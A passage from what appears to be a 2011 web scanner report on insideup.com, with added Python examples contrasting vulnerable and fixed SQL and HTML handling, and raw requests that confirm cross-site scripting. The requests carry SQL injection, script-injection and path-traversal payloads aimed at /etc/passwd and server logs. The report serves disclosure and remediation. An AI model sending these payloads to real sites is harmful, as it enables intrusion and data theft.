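PROBE = ("'||cast((select chr(95)||chr(33)||chr(64)||chr(53)||chr(100)||chr(105)"
         "||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)) as numeric)||'")


def open_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def page_url(cat_id, iusrc):
    # The echoed SQL compares project_page_url against the request path and
    # query string, minus the /ppc prefix.
    return f"leadflow/fist00/project.php?catId={cat_id}&iusrc={iusrc}"


def lookup_vulnerable(conn, cat_id, iusrc):
    """Builds the statement by string concatenation, the pattern the echoed
    query implies. Returns ("rows", rows) on success; on a database error it
    returns ("error", text) where text is the statement followed by the error
    message, which is what the site wrote into its response body."""
    url = page_url(cat_id, iusrc)
    sql = ("select catId, groupId, templateId, project_page_url "
           "from lead_flow_one_pages_details "
           f"where project_page_url = '{url}' or project_page_url = '{url}/'")
    try:
        return "rows", conn.execute(sql).fetchall()
    except sqlite3.Error as exc:
        return "error", f"{sql}{exc}"


def lookup_parameterized(conn, cat_id, iusrc):
    """Same lookup with bound parameters: the request value never reaches the
    SQL parser, so a quote or a ||cast(...) in it is just text to compare."""
    url = page_url(cat_id, iusrc)
    sql = ("select catId, groupId, templateId, project_page_url "
           "from lead_flow_one_pages_details "
           "where project_page_url = ? or project_page_url = ?")
    return "rows", conn.execute(sql, (url, url + "/")).fetchall()


if __name__ == "__main__":
    db = open_db()
    for value in ("iupsc", "'", PROBE):
        print("concat :", lookup_vulnerable(db, 10003, value))
        print("params :", lookup_parameterized(db, 10003, value))
```

Run as a script it prints, for each of the benign value, a lone quote and the scanner's probe, what the concatenated and the parameterized lookup return; only the concatenated version ever returns the statement text, and only for the two hostile inputs.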
Cross-site Scripting

150 TOTAL (IMPORTANT), 150 CONFIRMED
XSS (Cross-site Scripting) allows an attacker to execute a script (JavaScript, VBScript) in the context of the application, inside another user's browser. This opens several attack opportunities, most commonly hijacking the victim's current session or rewriting the page's HTML on the fly to steal the victim's credentials. It happens because input supplied by one user is interpreted as HTML, JavaScript or VBScript by the browser that renders the page.

XSS targets the users of the application rather than the server. That is a limitation, but not a small one: because it lets an attacker hijack other users' sessions, an attacker who targets an administrator can gain full control over the application.

Impact

There are many different attacks that can be leveraged through the use of XSS, including:
  • Hijacking a user's active session.
  • Changing the look of the page within the victim's browser.
  • Mounting a successful phishing attack.
  • Intercepting data and performing man-in-the-middle attacks from within the victim's browser.

Remedy

The issue occurs because the browser interprets the input as active HTML, JavaScript or VBScript. To avoid this, all input to and output from the application should be filtered. Output must be encoded according to the output format and location, because the characters that are dangerous differ between an HTML body, an HTML attribute, a JavaScript string and a URL. Typically the output location is HTML. Where the output is HTML, ensure that all active content is removed or encoded before the page is sent to the browser; filtering on the way in does not help if the value is later written out unencoded.

Before sanitizing user input, define a white-list of the characters that are expected and acceptable for each field. This list needs to be defined only once and should then be used to validate all subsequent input. A value that passes such validation still has to be encoded wherever it is written into a page: a legitimate company name such as O'Reilly & Sons contains characters that are harmless as data but must still be encoded when written into HTML.

Well-structured white-list libraries are available for many environments; OWASP Reform and the Microsoft Anti-Cross Site Scripting Library are good examples.
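The /whitePapaper.html instance listed after the references was confirmed by the scanner on the company POST field. The following Python example is added here and is not code from insideup.com or from Netsparker; it shows the two controls the remedy describes side by side: a renderer that concatenates the field into the page the way a reflected finding on a form field implies, the same renderer with context-appropriate output encoding for an HTML attribute and for a JavaScript string literal, and a white-list validator for the company field. The payload is the one from the /whitePapaper.html request body (the parameter table shows it as alert(0x000367), the raw body as netsparker(0x000367)); the markup around the field and the allowlist pattern are assumptions made for the example.

```python
import html
import json
import re

# The value the scanner posted in the "company" field of /whitePapaper.html,
# copied from the request body in the report (URL-decoded).
PAYLOAD = "'\"--></style></script><script>netsparker(0x000367)</script>"


def render_vulnerable(company):
    """Writes the submitted value straight back into the form. The markup is an
    assumption; the behaviour is what a confirmed reflected finding implies."""
    return f'<input type="text" name="company" value="{company}">'


def encode_html(value):
    # HTML body and quoted-attribute context: &, <, >, " and ' all become
    # character references, so the value can neither close the attribute nor
    # open a tag.
    return html.escape(value, quote=True)


def encode_js_string(value):
    # JavaScript string-literal context inside an inline <script>: json.dumps
    # escapes quotes and backslashes; replacing "<" as well means the value can
    # never form "</script>", which would end the script block early.
    return json.dumps(value).replace("<", "\\u003c")


def render_safe(company):
    return f'<input type="text" name="company" value="{encode_html(company)}">'


def render_safe_inline_script(company):
    return f"<script>var company = {encode_js_string(company)};</script>"


# Allowlist for a company-name field: letters, digits, space and a few
# punctuation characters, at most 100 long. Assumed for this example; the
# site's own rule, if it has one, is not known from the report.
COMPANY_RE = re.compile(r"[A-Za-z0-9 .,&'\-]{1,100}")


def validate_company(value):
    return COMPANY_RE.fullmatch(value) is not None


def contains_script_tag(markup):
    """Rough check used only to contrast the renderers: does a literal <script
    tag survive in the output?"""
    return "<script" in markup.lower()


if __name__ == "__main__":
    print(render_vulnerable(PAYLOAD))
    print(render_safe(PAYLOAD))
    print(render_safe_inline_script(PAYLOAD))
    print(validate_company(PAYLOAD), validate_company("O'Reilly & Co"))
```

Validation rejects the probe outright, but the encoding functions are what protect a value that validation has to accept: O'Reilly & Co passes the allowlist and is still written as O&#x27;Reilly &amp; Co, so the same encoder serves both hostile and legitimate input.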

Remedy References

External References

/whitePapaper.html CONFIRMED

http://www.insideup.com/whitePapaper.html

Parameters

Parameter Type Value
company POST '"--></style></script><script>alert(0x000367)</script>
companyServices POST 3
email POST netsparker@example.com
firstName POST Smith
iusrc POST 3
lastName POST Smith
parentPage POST 3
phone POST 3
src POST aboutUs
Submit POST 3
url POST 3

Request

POST /whitePapaper.html HTTP/1.1
Referer: http://www.insideup.com/aboutUs.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Content-Length: 229
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

company='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x000367)%3c%2fscript%3e&companyServices=3&email=netsparker%40example.com&firstName=Smith&iusrc=3&lastName=Smith&parentPage=3&phone=3&src=aboutUs&Submit=3&url=3

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:20:03 GMT
Server: Apache/2.2.9 (Fedora)
Set-Cookie: JSESSIONID=B2AC4951C334EC42E37C39F904846994; Path=/
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache,no-store
Content-Language: en-US
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html;charset=ISO-8859-1


<!DOCTYPE html><html><head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <meta name="keywords" content=""/> <meta name="description" content=""/> <meta name="robots" content="index; follow"/> <title></title> <link href="/css/reset.css" rel="stylesheet" type="text/css"><link href="/css/grid.css" rel="stylesheet" type="text/css"><link href="/css/newstyle.css" rel="stylesheet" type="text/css"><script type="text/javascript" src="/js/jquery-1.2.1.js"></script><script type="text/javascript" src="/js/ajax.js"></script><script type="text/javascript" src="/js/ajax-dynamic-list.js"></script><script type="text/javascript" src="/js/default.js"></script><script type="text/javascript"> var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www."); document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-5083151-1"); pageTracker._setDomainName(".insideup.com"); pageTracker._trackPageview(); } catch(err) {}</script></head><body><div class="container"> <div class="wrapper"> <div class="header"> <script language="javascript">function clearInput(e){if(e.value=='username'||e.value=='password'){e.value="";} }</script> <style>.c_767676, a.c_767676:link, a.c_767676:visited { color:#767676; text-decoration:none; font:bold 14px Arial;}a.c_767676:hover { color:#767676; text-decoration:underline; font:bold 14px Arial;}</style> <div class="h-container"> <div> <div class="float-left logo"><a href="/index.html"><img src="/images/logo.png" alt="InsideUp Logo" width="157" height="78"></a></div> <div style="float:left;padding:10px 0 0 10px;"> <div style="float:left;padding:7px 0px 0 0;font-size:11px;color:#777777;font-weight:bold;">Your City:</div> <div style="float:left;padding:0px 0 0 7px; width:123px;color:#2B70CD;font-weight:bold;font-size:9px;"> <div style="float:left;width:135px; 
- /whitePapaper.html

/whitePapaper.html CONFIRMED

http://www.insideup.com/whitePapaper.html

Parameters

Parameter Type Value
company POST 3
companyServices POST '"--></style></script><script>alert(0x0003B8)</script>
email POST netsparker@example.com
firstName POST Smith
iusrc POST 3
lastName POST Smith
parentPage POST 3
phone POST 3
src POST aboutUs
Submit POST 3
url POST 3

Request

POST /whitePapaper.html HTTP/1.1
Referer: http://www.insideup.com/aboutUs.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.insideup.com
Cookie: OAVARS[../../../../../../../../../../proc/self/fd/2\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Content-Length: 229
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

company=3&companyServices='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x0003B8)%3c%2fscript%3e&email=netsparker%40example.com&firstName=Smith&iusrc=3&lastName=Smith&parentPage=3&phone=3&src=aboutUs&Submit=3&url=3

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:20:19 GMT
Server: Apache/2.2.9 (Fedora)
Set-Cookie: JSESSIONID=DA48E834479055D75BDFD5DF17795632; Path=/
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache,no-store
Content-Language: en-US
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html;charset=ISO-8859-1


- /whitePapaper.html

/whitePapaper.html CONFIRMED

http://www.insideup.com/whitePapaper.html

Parameters

Parameter Type Value
company POST 3
companyServices POST 3
email POST '"--></style></script><script>alert(0x0003F5)</script>
firstName POST Smith
iusrc POST 3
lastName POST Smith
parentPage POST 3
phone POST 3
src POST aboutUs
Submit POST 3
url POST 3

Request

POST /whitePapaper.html HTTP/1.1
Referer: http://www.insideup.com/aboutUs.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 